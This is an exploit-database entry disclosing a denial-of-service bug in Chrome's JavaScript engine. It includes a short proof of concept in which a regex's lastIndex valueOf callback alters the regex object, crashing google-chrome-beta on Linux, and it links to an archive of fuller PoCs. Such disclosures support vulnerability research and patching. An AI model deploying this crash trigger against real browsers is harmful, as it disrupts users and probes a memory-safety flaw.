EDB-ID: 42286 | Author: Google Security Research | Published: 2017-06-30 | CVE: N/A | Type: Dos | Platform: Multiple | Aliases: N/A | Advisory/Source: Link | Tags: Out Of Bounds | Vulnerable App: N/A |
A minimal PoC is as follows, and two full PoCs (one for test and one for exec) are attached.
var re;
function f(){
for(var i = 0; i < 100; i++){
re["test" + i] = 0x77777777; // make a dict
}
return 0;
}
re = /-/g;
var str = '2016-01-02';
re.lastIndex = {valueOf : f};
result = re.exec(str);
This PoC crashes on google-chrome-beta on Linux.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42286.zip
